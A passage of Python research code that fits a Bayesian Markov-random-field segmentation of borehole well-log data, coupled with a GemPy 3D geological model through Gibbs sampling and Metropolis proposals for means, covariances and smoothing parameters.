raw_data(pandas_dataframe): X, Y, Z, Well Name, Log I, Log II, Log III...\n feature_names (list with strings): names of the logs (e.g. 'IND' or 'PE')\n boreholes (list of strings): names of the boreholes (e.g. 'BH1' or 'Well1')\n\n Out: lith_block[0]: label for each grid point in the 3D gempy model (shape: gp_resolution^3 x 1)\n --> reshape(gp_res, gp_res, gp_res)\n \"\"\"\n\n self.labels_gp = labels\n self.labels_prob_gp = labels_prob\n # **************************************************************************************************************\n # Zoning each borehole to find the boundaries between the zones or units (based on segmented data)\n\n self.boundary = []\n self.formation = []\n len_tot = 0\n\n for i in range(self.n_boreholes):\n self.pos = np.where(self.raw_data == self.boreholes[i])[0] # split data in boreholes\n self.boundary_temp2, self.formation_temp = self.find_boundaries_new(self.labels_prob_gp[self.pos],\n self.n_labels) # find boundary in each borehole\n\n for k in range(self.n_labels):\n self.formation.append(self.formation_temp[k])\n\n for k in range(self.n_labels - 1):\n # save boundaries ()\n self.boundary.append((self.boundary_temp2[k] + len_tot - 1))\n self.boundary.append(self.pos[-1])\n # print('Borehole', i + 1, 'of', self.n_boreholes, 'is zoned...')\n\n len_tot = len_tot + len(self.pos)\n\n self.boundary, self.formation = zip(*sorted(zip(self.boundary, self.formation)))\n self.boundary = list(self.boundary)\n self.formation = list(self.formation)\n\n print('Borehole zoning finished!')\n\n # create gempy_file including X,Y,Z,labels,borehole name\n #self.formation = list(range(self.n_boreholes))\n #self.boundary.sort()\n #self.formation.append(mode(self.labels_gp[0:self.boundary[0]]))\n #for k in range(self.n_labels):\n #self.formation.append(mode(self.labels_gp[self.boundary[k]:self.boundary[k+1]]))\n #self.formation = [self.formation for x in range(self.n_labels)]\n #self.formation = [item for sublist in self.formation for item in sublist]\n\n self.gempy = pd.DataFrame({'X': raw_data.X[self.boundary], 'Y': raw_data.Y[self.boundary],\n 'Z': raw_data.Z[self.boundary], 'formation': self.formation,\n 'borehole': raw_data['Well Name'][self.boundary]})\n\n # rename the layers to put in gempy (x --> layer x+1 | e.g. 0 --> layer 1)\n for k in range(0, 1 + len(set(list(self.gempy['formation'])))):\n self.gempy['formation'] = self.gempy['formation'].replace(to_replace=k, value='Layer %d' % (k + 1))\n\n # save gempy_input file as csv-file\n self.gempy = self.gempy.sort_values('formation').reset_index(drop=True)\n\n self.gempy.to_csv('../bayseg/data_temp/GemPy_BaySeg_temp.csv', index=False)\n\n # execute gempy (load input files | interfaces + orientations)\n self.geo_data = gp.create_data([int(min(self.gempy.X) - min(self.gempy.X)*0.1),\n int(max(self.gempy.X) + max(self.gempy.X) *0.1) ,\n int(min(self.gempy.Y) - min(self.gempy.Y)*0.1) ,\n int(max(self.gempy.Y) + min(self.gempy.Y)*0.1) ,\n int(min(self.gempy.Z) + min(self.gempy.Z)*0.1) , 0],\n [self.gp_resolution, self.gp_resolution, self.gp_resolution],\n # path_o=\"../data/Gempy_Simple_4_layer_90degrees_orientation.csv\",\n path_i=\"../bayseg/data_temp/GemPy_BaySeg_temp.csv\")\n\n # extract the stratigraphic order from the saved formations\n self.series = pd.unique(np.flipud(self.geo_data.interfaces.sort_values('Z').formation)[:-1])\n #list(self.gempy.loc[np.where(self.gempy.borehole == self.boreholes[0])[0]]\n # .sort_values('Z',ascending = False).formation.values)\n\n # set orientation information\n self.series = pd.unique(np.flipud(self.geo_data.interfaces.sort_values('Z').formation)[:-1])\n if 'basement' in self.series:\n self.series = np.delete(self.series, np.where(self.series == 'basement')[0][0])\n #list(self.gempy.loc[np.where(self.gempy.borehole == self.boreholes[0])[0]]\n # .sort_values('Z',ascending = False).formation.values)\n\n # set orientation information\n self.save_ori = []\n for i in range(1,self.n_labels+1):\n ori_points = self.nearest_points(i)\n gp.set_orientation_from_interfaces(self.geo_data, ori_points)\n self.save_ori.append(ori_points)\n\n # set stratigraphic pile for gempy\n gp.set_series(self.geo_data, {\"Strat_Series\": list(self.series)},\n order_series=[\"Strat_Series\"],\n order_formations=list(self.series), verbose=0)\n\n # interpolate the data in the 3D gempy model (full theano compiling only for first iteration)\n if len(self.labels) == 1:\n self.interp_data = gp.InterpolatorData(self.geo_data, u_grade=[1], output='geology', compile_theano=True,\n dtype='float64', theano_optimizer='fast_compile')\n else: self.interp_data.update_interpolator(self.geo_data)\n\n # compute gempy model\n self.lith_block, self.fault_block = gp.compute_model(self.interp_data)\n\n # activate plotting of gempy model section\n if len(self.labels) == self.n_inter:\n if plot == '2dx':\n gp.plotting.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='x', plot_data=True)\n # gp.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='x', plot_data=True)\n elif plot == '2dy':\n gp.plotting.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='y', plot_data=True)\n # gp.plot_section(self.geo_data, self.lith_block[0], cell_number=5, direction='y', plot_data=False)\n elif plot == '3d':\n ver_s, sim_s = gp.get_surfaces(self.interp_data, self.lith_block[1], original_scale=True)\n gp.plotting.plot_surfaces_3D_real_time(self.geo_data,self.interp_data, ver_s, sim_s)\n else: pass\n\n # renaming lith_block in the same way as self.labels (gempy renames the labels from 1 to n_labels)\n self.rename_lith_block()\n #self.lith_block[0] = np.round(self.lith_block[0], 0)\n\n #for i in range(self.n_labels):\n #np.place(self.lith_block[0], self.lith_block[0] == i + 1,\n #[int(s) for s in self.series[i].split() if s.isdigit()][0] - 1 + 10)\n #self.lith_block[0] = (self.lith_block[0] - 10) # +10 -10 to avoid overwriting in loop\n\n # create index_gempy (only in first iteration because do not change)\n self.gempy_indicies()\n\n print('Gempy model finished!')\n\n def rename_lith_block(self):\n self.lith_block[0] = np.round(self.lith_block[0], 0)\n\n name_temp = []\n name_temp.append(self.labels[-1][0:self.boundary[0]])\n\n for i in range(self.n_labels - 1):\n name_temp.append(self.labels[-1][self.boundary[i]:self.boundary[i + 1]])\n\n for k in range(self.n_labels):\n lab = np.where(np.bincount(name_temp[k], minlength=self.n_labels) ==\n max(np.bincount(name_temp[k], minlength=self.n_labels)))[0][0]\n\n self.lith_block[0][np.where(self.lith_block[0] == k + 1)[0]] = lab + 10\n\n self.lith_block[0] = self.lith_block[0] - 10\n\n def gempy_indicies(self):\n \"\"\"\n Finds the indicies in the 3D gempy grid, which are the closest to the borehole data points\n\n Out: positions of the boundaries in the borehole\n \"\"\"\n # build vector containing the coordinates of all borehole data points\n self.coords = self.raw_data.loc[:,['X','Y','Z']].values\n\n self.index_temp = []\n self.index_gempy = []\n\n # reshape the grid in the same way as the gempy labels for the gibbs energy calculation\n for i in range(self.gp_resolution):\n self.index_temp.append(self.geo_data.grid.values.reshape(\n self.gp_resolution, self.gp_resolution,\n self.gp_resolution, 3)[:, :, i, :].reshape(\n self.gp_resolution ** 2, 3))\n\n self.index_temp = np.asarray(self.index_temp).reshape(self.gp_resolution ** 3, 3)\n\n # index_gempy = minimum (gempy_coords - borehole_coords[i])\n for i in range(len(self.coords)):\n self.index_gempy.append(np.sum(np.abs(self.index_temp - self.coords[i]), axis=1).argmin())\n\n def find_boundaries_new(self, labels_proba, n):\n max_prob = np.sum(labels_proba, axis=0)\n\n likelihood_sum = []\n for i in range(len(labels_proba) + 1):\n likelihood_sum.append(np.sum(labels_proba[0:i], axis=0))\n\n likelihood_sum_norm = likelihood_sum/max_prob\n\n b_temp = []\n formation = []\n for k in range(n):\n lst = np.arange(n)\n lst = np.delete(lst, k)\n cum_like = n*likelihood_sum_norm[:,k] - np.sum(likelihood_sum_norm[:,lst],axis=1)\n b_temp.append(np.where(cum_like == max(cum_like))[0][0])\n formation.append(k)\n\n b_temp.sort()\n b_temp = b_temp[0:n-1]\n return b_temp, formation\n\n def find_boundaries(self, seg_data, n):\n \"\"\"\n Finds the zone boundaries, which minimize the variance in each zones\n --> applied to each borehole separately\n\n Args:\n seg_data: labels for each data point in one borehole\n n: number of zones\n\n Out: positions of the boundaries in the borehole\n \"\"\"\n\n var_t = []\n var_bz = []\n\n for i in range(2, len(seg_data) - (n - 1)):\n if n == 2:\n var_t.append((np.sum(np.var(seg_data[0:i])) + np.sum(np.var(seg_data[i:-1])), i))\n var_bz.append((np.var([np.mean(seg_data[0:i]), np.mean(seg_data[i:-1])]), i))\n else:\n for j in range(i + 2, len(seg_data) - (n - 2)):\n if n == 3:\n var_t.append((np.sum(np.var(seg_data[0:i])) + np.sum(np.var(seg_data[i:j])) + np.sum(\n np.var(seg_data[j:-1])), i, j))\n var_bz.append(\n (np.var([np.mean(seg_data[0:i]), np.mean(seg_data[i:j]), np.mean(seg_data[j:-1])]), i, j))\n # boundaries = np.where(var_t == min(var_t))[0][0] + 2\n else:\n for k in range(j + 2, len(seg_data) - (n - 3)):\n if n == 4:\n var_t.append((np.sum(np.var(seg_data[0:i])) + np.sum(np.var(seg_data[i:j])) + np.sum(\n np.var(seg_data[j:k])) + np.sum(np.var(seg_data[k:-1])), i, j, k))\n var_bz.append((np.var(\n [np.mean(seg_data[0:i]), np.mean(seg_data[i:j]), np.mean(seg_data[j:k]),\n np.mean(seg_data[k:-1])]), i, j, k))\n else:\n for l in range(k + 2, len(seg_data) - (n - 4)): # check from here\n if n == 5:\n var_t.append((\n np.sum(np.var(seg_data[0:i])) + np.sum(np.var(seg_data[i:j])) + np.sum(\n np.var(seg_data[j:k])) + np.sum(np.var(seg_data[k:l])) + np.sum(\n np.var(seg_data[l:-1])), i, j, k, l))\n var_bz.append((np.var(\n [np.mean(seg_data[0:i]), np.mean(seg_data[i:j]), np.mean(seg_data[j:k]),\n np.mean(seg_data[k:-1])]), i, j, k))\n else:\n for m in range(l + 2, len(seg_data) - (n - 5)):\n if n == 6:\n var_t.append((np.sum(np.var(seg_data[0:i])) + np.sum(\n np.var(seg_data[i:j])) + np.sum(np.var(seg_data[j:k])) + + np.sum(\n np.var(seg_data[k:l])) + np.sum(np.var(seg_data[l:m])) + np.sum(\n np.var(seg_data[m:-1])), i, j, k, l, m))\n var_bz.append((np.var(\n [np.mean(seg_data[0:i]), np.mean(seg_data[i:j]),\n np.mean(seg_data[j:k]),\n np.mean(seg_data[k:-1])]), i, j, k))\n else:\n pass\n\n return min(var_t)[1:n] # , max(var_bz)[1:n]] # for maximum variance between clusters\n\n def calc_gempy_energy_vect(self, beta, verbose=False):\n # Calculate gempy energy (gibbs energy from surroundings\n # need to be done plain wise bbecause of 2D --> gempy.plains (plains with constant z)\n # insert only one plain as vector (Y x 1)\n # print(np.round(self.lith_block[]))\n\n self.gempy_plains = self.lith_block[0].reshape(self.gp_resolution, self.gp_resolution, self.gp_resolution)\n self.gempy_energy_temp = []\n\n # calculate gibbs energy for each gempy Z-plain\n for i in range(self.gp_resolution):\n self.gempy_energy_temp.append(\n self._calc_gibbs_energy_vect(self.gempy_plains[:, :, i].reshape(self.gp_resolution ** 2),\n beta, dim=2, verbose=verbose)) # 2D energy from Gempy mode\n # reshape\n self.gempy_energy_temp_total = np.asarray(self.gempy_energy_temp).reshape(self.gp_resolution ** 3, self.n_labels)\n return self.gempy_energy_temp_total[self.index_gempy]\n\n # ************************************************************************************************\n def fit(self, n, beta_jump_length=10, mu_jump_length=0.0005, cov_volume_jump_length=0.00005,\n theta_jump_length=0.0005, t=1., verbose=False, fix_beta=False, plot=False):\n \"\"\"Fit the segmentation parameters to the given data.\n\n Args:\n n (int): Number of iterations.\n beta_jump_length (float): Hyperparameter specifying the beta proposal jump length.\n mu_jump_length (float): Hyperparameter for the mean proposal jump length.\n cov_volume_jump_length (float):\n theta_jump_length (float):\n t (float):\n verbose (bool or :obj:`str`):\n fix_beta (bool):\n\n \"\"\"\n self.n_inter = n\n for g in tqdm.trange(n):\n self.gibbs_sample(t, beta_jump_length, mu_jump_length, cov_volume_jump_length, theta_jump_length,\n verbose, fix_beta, plot)\n\n def gibbs_sample(self, t, beta_jump_length, mu_jump_length, cov_volume_jump_length, theta_jump_length, verbose,\n fix_beta, plot):\n \"\"\"Takes care of the Gibbs sampling. This is the main function of the algorithm.\n\n Args:\n t: Hyperparameter\n beta_jump_length: Hyperparameter\n mu_jump_length: Hyperparameter\n cov_volume_jump_length: Hyperparameter\n theta_jump_length: Hyperparameter\n verbose (bool or :obj:`str`): Toggles verbosity.\n fix_beta (bool): Fixed beta to the inital value if True, else adaptive.\n\n Returns:\n The function updates directly on the object variables and appends new draws of labels and\n parameters to their respective storages.\n \"\"\"\n # TODO: [GENERAL] In-depth description of the gibbs sampling function\n\n # ************************************************\n # CALCULATE TOTAL ENERGY\n # 1 - calculate energy likelihood for each element and label\n # way to avoid over-smoothing by the gibbs energy\n energy_like = self.calc_energy_like(self.mus[-1], self.covs[-1])\n if verbose == \"energy\":\n print(\"likelihood energy:\", energy_like)\n # 2 - calculate gibbs/mrf energy\n gibbs_energy = self._calc_gibbs_energy_vect(self.labels[-1], self.betas[-1], dim=1, verbose=verbose)\n if verbose == \"energy\":\n print(\"gibbs energy:\", gibbs_energy)\n\n # 5 - calculate total energy without gempy model\n total_energy = energy_like + gibbs_energy\n # CALCULATE PROBABILITY OF LABELS without gempy model\n labels_prob = _calc_labels_prob(total_energy, t)\n\n if self.inc_gempy == True and len(self.labels) == 1:\n # create gempy model with old labels and calculate gempy energy\n self.create_gempy(self.labels[-1], self.raw_data, labels_prob, plot)\n gempy_energy = self.calc_gempy_energy_vect(self.betas_gp[-1])\n # 5 - calculate total energy with gempy model\n total_energy = energy_like + gibbs_energy + gempy_energy\n # CALCULATE PROBABILITY OF LABELS with gempy model\n labels_prob = _calc_labels_prob(total_energy, t)\n else: pass\n\n self.storage_te.append(total_energy)\n\n # make copy of previous labels\n new_labels = copy(self.labels[-1])\n\n # draw new random sample and update old labeling\n # TODO: create GemPy model and GemPy energy in each iteration of updating labels\n # TODO: just insert the GemPy Energy based on old GemPy model?\n # TODO: can be neglected because of computational time\n # TODO: GemPy model is not considered when updating labels so far\n for i, color_f in enumerate(self.colors):\n new_labels[color_f] = draw_labels_vect(labels_prob[color_f])\n # now recalculate gibbs energy and other energies from the mixture of old and new labels\n gibbs_energy = self._calc_gibbs_energy_vect(new_labels, self.betas[-1], dim=1, verbose=verbose)\n total_energy = energy_like + gibbs_energy\n labels_prob = _calc_labels_prob(total_energy, t)\n\n if self.inc_gempy == True:\n # create gempy model with old labels and calculate gempy energy\n self.create_gempy(new_labels, self.raw_data, labels_prob, plot)\n gempy_energy = self.calc_gempy_energy_vect(self.betas_gp[-1])\n total_energy = energy_like + gibbs_energy + gempy_energy\n labels_prob = _calc_labels_prob(total_energy, t)\n else: pass\n\n self.labels_probability.append(labels_prob)\n self.labels.append(new_labels)\n\n # ************************************************************************************************\n # calculate energy for component coefficient\n # TODO: Check what component coefficient is and maybe add gempy energy\n if self.inc_gempy == True:\n energy_for_comp_coef = gibbs_energy\n energy_for_comp_coef_gp = gempy_energy\n else: energy_for_comp_coef = gibbs_energy\n # print(\"ge shp:\", gibbs_energy)\n # ************************************************************************************************\n # CALCULATE COMPONENT COEFFICIENT\n comp_coef = _calc_labels_prob(energy_for_comp_coef, t)\n if self.inc_gempy == True:\n comp_coef_gp = _calc_labels_prob(energy_for_comp_coef_gp, t)\n # ************************************************************************************************\n # ************************************************************************************************\n # PROPOSAL STEP\n # make proposals for beta, mu and cov\n # beta depends on physical dimensions, for 1d its size 1\n beta_prop = self.propose_beta(self.betas[-1], beta_jump_length, dim = 1)\n\n if self.inc_gempy == True:\n beta_prop_gp = self.propose_beta(self.betas_gp[-1], beta_jump_length, dim = 2)\n else: pass\n\n # print(\"beta prop:\", beta_prop)\n mu_prop = self.propose_mu(self.mus[-1], mu_jump_length)\n # print(\"mu prop:\", mu_prop)\n cov_prop = _propose_cov(self.covs[-1], self.n_feat, self.n_labels, cov_volume_jump_length, theta_jump_length)\n # print(\"cov_prop:\", cov_prop)\n\n # ************************************************************************************************\n # Compare mu, cov and beta proposals with previous, then decide which to keep for next iteration\n\n # prepare next ones\n mu_next = copy(self.mus[-1])\n cov_next = copy(self.covs[-1])\n\n # ************************************************************************************************\n # UPDATE MU\n for l in range(self.n_labels):\n # log-prob prior density for mu\n mu_temp = copy(mu_next)\n mu_temp[l, :] = mu_prop[l, :]\n\n lp_mu_prev = self.log_prior_density_mu(mu_next, l)\n lp_mu_prop = self.log_prior_density_mu(mu_temp, l)\n\n lmd_prev = self.calc_sum_log_mixture_density(comp_coef, mu_next, cov_next)\n # calculate log mixture density for proposed mu and cov\n lmd_prop = self.calc_sum_log_mixture_density(comp_coef, mu_temp, cov_next)\n\n # combine\n log_target_prev = lmd_prev + lp_mu_prev\n log_target_prop = lmd_prop + lp_mu_prop\n\n mu_eval = evaluate(log_target_prop, log_target_prev)\n if mu_eval[0]:\n mu_next[l, :] = mu_prop[l, :]\n else:\n pass\n self.mu_acc_ratio = np.append(self.mu_acc_ratio, mu_eval[1])\n\n self.mus.append(mu_next)\n\n # ************************************************************************************************\n # UPDATE COVARIANCE\n for l in range(self.n_labels):\n cov_temp = copy(cov_next)\n cov_temp[l, :, :] = cov_prop[l, :, :]\n\n # print(\"cov diff:\", cov_next[l, :, :]-cov_temp[l, :, :])\n\n # log-prob prior density for covariance\n lp_cov_prev = self.log_prior_density_cov(cov_next, l)\n # print(\"lp_cov_prev:\", lp_cov_prev)\n lp_cov_prop = self.log_prior_density_cov(cov_temp, l)\n # print(\"lp_cov_prop:\", lp_cov_prop)\n\n lmd_prev = self.calc_sum_log_mixture_density(comp_coef, mu_next, cov_next)\n # print(\"lmd_prev:\", lmd_prev)\n # calculate log mixture density for proposed mu and cov\n lmd_prop = self.calc_sum_log_mixture_density(comp_coef, mu_next, cov_temp)\n # print(\"lmd_prop:\", lmd_prop)\n\n # combine\n log_target_prev = lmd_prev + lp_cov_prev\n log_target_prop = lmd_prop + lp_cov_prop\n\n mu_eval = evaluate(log_target_prop, log_target_prev)\n if mu_eval[0]:\n cov_next[l, :] = cov_prop[l, :]\n else:\n pass\n self.cov_acc_ratio = np.append(self.cov_acc_ratio, mu_eval[1])\n\n # append cov and mu\n self.covs.append(cov_next)\n self.storage_gibbs_e.append(gibbs_energy)\n self.storage_like_e.append(energy_like)\n\n if self.inc_gempy == True:\n self.storage_gempy_e.append(gempy_energy)\n else: pass\n\n if not fix_beta:\n # ************************************************************************************************\n # UPDATE BETA FOR Well data\n lp_beta_prev = self.log_prior_density_beta(self.betas[-1])\n lp_beta_prop = self.log_prior_density_beta(beta_prop)\n\n lmd_prev = self.calc_sum_log_mixture_density(comp_coef, self.mus[-1], self.covs[-1])\n\n # calculate gibbs energy with new labels and proposed beta\n gibbs_energy_prop = self._calc_gibbs_energy_vect(self.labels[-1], beta_prop, dim=1, verbose=verbose)\n energy_for_comp_coef_prop = gibbs_energy_prop # + self_energy\n comp_coef_prop = _calc_labels_prob(energy_for_comp_coef_prop, t)\n\n lmd_prop = self.calc_sum_log_mixture_density(comp_coef_prop, self.mus[-1], self.covs[-1])\n # print(\"lmd_prev:\", lmd_prev)\n # print(\"lp_beta_prev:\", lp_beta_prev)\n log_target_prev = lmd_prev + lp_beta_prev\n # print(\"lmd_prop:\", lmd_prop)\n # print(\"lp_beta_prop:\", lp_beta_prop)\n log_target_prop = lmd_prop + lp_beta_prop\n\n mu_eval = evaluate(log_target_prop, log_target_prev)\n if mu_eval[0]:\n self.betas.append(beta_prop)\n else:\n self.betas.append(self.betas[-1])\n self.beta_acc_ratio = np.append(self.beta_acc_ratio, mu_eval[1]) # store\n\n # UPDATE BETA FOR GemPY model\n if self.inc_gempy == True:\n lp_beta_prev = self.log_prior_density_beta(self.betas_gp[-1], dim =2)\n lp_beta_prop = self.log_prior_density_beta(beta_prop_gp, dim = 2)\n\n lmd_prev = self.calc_sum_log_mixture_density(comp_coef_gp, self.mus[-1], self.covs[-1])\n\n # calculate gibbs energy with new labels and proposed beta\n gempy_energy_prop = self.calc_gempy_energy_vect(beta_prop_gp)\n energy_for_comp_coef_prop_gp = gempy_energy_prop # + self_energy\n comp_coef_prop_gp = _calc_labels_prob(energy_for_comp_coef_prop_gp, t)\n\n lmd_prop = self.calc_sum_log_mixture_density(comp_coef_prop_gp, self.mus[-1], self.covs[-1])\n # print(\"lmd_prev:\", lmd_prev)\n # print(\"lp_beta_prev:\", lp_beta_prev)\n log_target_prev = lmd_prev + lp_beta_prev\n # print(\"lmd_prop:\", lmd_prop)\n # print(\"lp_beta_prop:\", lp_beta_prop)\n log_target_prop = lmd_prop + lp_beta_prop\n\n mu_eval = evaluate(log_target_prop, log_target_prev)\n if mu_eval[0]:\n self.betas_gp.append(beta_prop_gp)\n else:\n self.betas_gp.append(self.betas_gp[-1])\n self.beta_acc_ratio = np.append(self.beta_gp_acc_ratio, mu_eval[1]) # store\n\n\n else:\n self.betas.append(self.betas[-1])\n self.betas_gp.append(self.betas_gp[-1])\n # ************************************************************************************************\n # **********************************************************\n\n def log_prior_density_mu(self, mu, label):\n \"\"\"Calculates the summed log prior density for a given mean and labels array.\"\"\"\n with np.errstate(divide='ignore'):\n return np.sum(np.log(self.priors_mu[label].pdf(mu)))\n\n def log_prior_density_beta(self, beta, dim = 1):\n \"\"\"Calculates the log prior density for a given beta array.\"\"\"\n if dim == 1:\n return np.log(self.prior_beta.pdf(beta))\n else:\n return np.log(self.prior_beta_gp.pdf(beta))\n\n def log_prior_density_cov(self, cov, l):\n \"\"\"Calculates the summed log prior density for the given covariance matrix and labels array.\"\"\"\n lam = np.sqrt(np.diag(cov[l, :, :]))\n r = np.diag(1. / lam) @ cov[l, :, :] @ np.diag(1. / lam)\n logp_r = -0.5 * (self.nu + self.n_feat + 1) * np.log(np.linalg.det(r)) - self.nu / 2. * np.sum(\n np.log(np.diag(np.linalg.inv(r))))\n logp_lam = np.sum(np.log(multivariate_normal(mean=self.b_sigma[l, :], cov=self.kesi[l, :]).pdf(np.log(lam.T))))\n return logp_r + logp_lam\n\n def propose_beta(self, beta_prev, beta_jump_length, dim = 1):\n \"\"\"Proposes a perturbed beta based on a jump length hyperparameter.\n\n Args:\n beta_prev:\n beta_jump_length:\n\n Returns:\n\n \"\"\"\n # create proposal covariance depending on physical dimensionality\n # dim = [1, 4, 13]\n if dim == 1:\n beta_dim = 1\n\n elif dim == 2:\n if self.stencil == \"4p\":\n beta_dim = 2\n elif self.stencil == \"8p\" or self.stencil is None:\n beta_dim = 4\n\n elif dim == 3:\n raise Exception(\"3D not yet supported.\")\n\n sigma_prop = np.eye(beta_dim) * beta_jump_length\n # draw from multivariate normal distribution and return\n # return np.exp(multivariate_normal(mean=np.log(beta_prev), cov=sigma_prop).rvs())\n return multivariate_normal(mean=beta_prev, cov=sigma_prop).rvs()\n\n def propose_mu(self, mu_prev, mu_jump_length):\n \"\"\"Proposes a perturbed mu matrix using a jump length hyperparameter.\n\n Args:\n mu_prev (:obj:`np.ndarray`): Previous mean array for all labels and features\n mu_jump_length (float or int): Hyperparameter specifying the jump length for the new proposal mean array.\n\n Returns:\n :obj:`np.ndarray`: The newly proposed mean array.\n\n \"\"\"\n # prepare matrix\n mu_prop = np.ones((self.n_labels, self.n_feat))\n # loop over labels\n for l in range(self.n_labels):\n mu_prop[l, :] = multivariate_normal(mean=mu_prev[l, :], cov=np.eye(self.n_feat) * mu_jump_length).rvs()\n return mu_prop\n\n def calc_sum_log_mixture_density(self, comp_coef, mu, cov):\n \"\"\"Calculate sum of log mixture density with each observation at every element.\n\n Args:\n comp_coef (:obj:`np.ndarray`): Component coefficient for each element (row) and label (column).\n mu (:obj:`np.ndarray`): Mean value array for all labels and features.\n cov (:obj:`np.ndarray`): Covariance matrix.\n\n Returns:\n float: Summed log mixture density.\n\n \"\"\"\n lmd = np.zeros((self.phys_shp.prod(), self.n_labels))\n\n for l in range(self.n_labels):\n draw = multivariate_normal(mean=mu[l, :], cov=cov[l, :, :]).pdf(self.feat)\n # print(np.shape(lmd[:,l]))\n multi = comp_coef[:, l] * np.array([draw])\n lmd[:, l] = multi\n lmd = np.sum(lmd, axis=1)\n with np.errstate(divide='ignore'):\n lmd = np.log(lmd)\n\n return np.sum(lmd)\n\n def calc_energy_like(self, mu, cov):\n \"\"\"Calculates the energy likelihood for a given mean array and covariance matrix for the entire domain.\n\n Args:\n mu (:obj:`np.ndarray`):\n cov (:obj:`np.ndarray`):\n vect (bool, optional): Toggles the vectorized implementation. False activates the loop-based version if\n you really dig a loss of speed of about 350 times.\n\n Returns:\n :obj:`np.ndarray` : Energy likelihood for each label at each element.\n \"\"\"\n energy_like_labels = np.zeros((self.phys_shp.prod(), self.n_labels))\n\n # uses flattened features array\n for l in range(self.n_labels):\n energy_like_labels[:, l] = np.einsum(\"...i,ji,...j\",\n 0.5 * np.array([self.feat.values - mu[l, :]]),\n np.linalg.inv(cov[l, :, :]),\n np.array([self.feat.values - mu[l, :]])) + 0.5 * np.log(\n np.linalg.det(cov[l, :, :]))\n\n return energy_like_labels\n\n def _calc_gibbs_energy_vect(self, labels, beta, dim, verbose=False):\n \"\"\"Calculates the Gibbs energy for each element using the penalty factor(s) beta.\n\n Args:\n labels (:obj:`np.ndarray`):\n beta (:obj:`np.array` of float):\n verbose (bool):\n\n Returns:\n :obj:`np.ndarray` : Gibbs energy at every element for each label.\n \"\"\"\n # ************************************************************************************************\n # 1D\n\n if dim == 1:\n # tile\n lt = np.tile(labels, (self.n_labels, 1)).T\n\n ge = np.arange(self.n_labels) # elements x labels\n ge = np.tile(ge, (len(labels), 1)).astype(float)\n\n # first row\n top = [np.not_equal(np.arange(self.n_labels), lt[1, :]) * beta]\n # mid\n mid = (np.not_equal(ge[1:-1, :], lt[:-2, :]).astype(float) + np.not_equal(ge[1:-1, :], lt[2:, :]).astype(\n float)) * beta\n # last row\n bot = [np.not_equal(np.arange(self.n_labels), lt[-2, :]) * beta]\n # put back together and return gibbs energy\n return np.concatenate((top, mid, bot))\n\n # ************************************************************************************************\n # 2D\n elif dim == 2:\n\n # TODO: Reshape according points that are insert\n # reshape the labels to 2D for \"stencil-application\"\n labels = labels.reshape(self.gp_resolution, self.gp_resolution) # self.shape[0], self.shape[1])\n\n # prepare gibbs energy array (filled with zeros)\n ge = np.tile(np.zeros_like(labels).astype(float), (self.n_labels, 1, 1))\n\n # create comparison array containing the different labels\n comp = np.tile(np.zeros_like(labels), (self.n_labels, 1, 1)).astype(float)\n for i in range(self.n_labels):\n comp[i, :, :] = i\n\n # anisotropic beta directions\n # 3 1 2\n # \\ | /\n # --+-- 0\n # / | \\\n\n # **********************************************************************************************************\n # direction 0 = 0° polar coord system\n ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[:-2, 1:-1]).astype(\n float) # compare with left\n + np.not_equal(comp[:, 1:-1, 1:-1], labels[2:, 1:-1]).astype(float)) * beta[0]\n # compare with right\n\n # left column\n # right\n ge[:, :, 0] += np.not_equal(comp[:, :, 0], labels[:, 1]).astype(float) * beta[0]\n # right column\n # left\n ge[:, :, -1] += np.not_equal(comp[:, :, -1], labels[:, -2]).astype(float) * beta[0]\n # top row\n # right\n ge[:, 0, :-1] += np.not_equal(comp[:, 0, :-1], labels[0, 1:]).astype(float) * beta[0]\n # left\n ge[:, 0, 1:] += np.not_equal(comp[:, 0, 1:], labels[0, :-1]).astype(float) * beta[0]\n # bottom row\n # right\n ge[:, -1, :-1] += np.not_equal(comp[:, -1, :-1], labels[-1, 1:]).astype(float) * beta[0]\n # left\n ge[:, -1, 1:] += np.not_equal(comp[:, -1, 1:], labels[-1, :-1]).astype(float) * beta[0]\n\n # **********************************************************************************************************\n # direction 1 = 90° polar coord system\n ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[1:-1, :-2]).astype(\n float) # compare with above\n + np.not_equal(comp[:, 1:-1, 1:-1], labels[1:-1, 2:]).astype(float)) * beta[\n 1] # compare with below\n # left column\n # above\n ge[:, 1:, 0] += np.not_equal(comp[:, 1:, 0], labels[:-1, 0]).astype(float) * beta[1]\n # below\n ge[:, :-1, 0] += np.not_equal(comp[:, :-1, 0], labels[1:, 0]).astype(float) * beta[1]\n # right column\n # above\n ge[:, 1:, -1] += np.not_equal(comp[:, 1:, -1], labels[:-1, -1]).astype(float) * beta[1]\n # below\n ge[:, :-1, -1] += np.not_equal(comp[:, :-1, -1], labels[1:, -1]).astype(float) * beta[1]\n # top row\n # below\n ge[:, 0, :] += np.not_equal(comp[:, 0, :], labels[1, :]).astype(float) * beta[1]\n # bottom row\n # above\n ge[:, -1, :] += np.not_equal(comp[:, -1, :], labels[-2, :]).astype(float) * beta[1]\n\n # **********************************************************************************************************\n # direction 2 = 45° polar coord system\n if self.stencil is \"8p\":\n ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[2:, :-2]).astype(\n float) # compare with right up\n + np.not_equal(comp[:, 1:-1, 1:-1], labels[:-2, 2:]).astype(float)) * beta[\n 2] # compare with left down\n # left column\n # right up\n ge[:, 1:, 0] += np.not_equal(comp[:, 1:, 0], labels[:-1, 1]).astype(float) * beta[2]\n # right column\n # left down\n ge[:, :-1, -1] += np.not_equal(comp[:, :-1, -1], labels[1:, -2]).astype(float) * beta[2]\n # top row\n # below left\n ge[:, 0, 1:] += np.not_equal(comp[:, 0, 1:], labels[1, :-1]).astype(float) * beta[2]\n # bottom row\n # above right\n ge[:, -1, :-1] += np.not_equal(comp[:, -1, :-1], labels[-2, 1:]).astype(float) * beta[2]\n # **********************************************************************************************************\n # direction 3 = 135° polar coord system\n if self.stencil is \"8p\":\n ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[:-2, :-2]).astype(\n float) # compare with left up\n + np.not_equal(comp[:, 1:-1, 1:-1], labels[2:, 2:]).astype(float)) * beta[\n 3] # compare with right down\n # left column\n # right down\n ge[:, :-1, 0] += np.not_equal(comp[:, 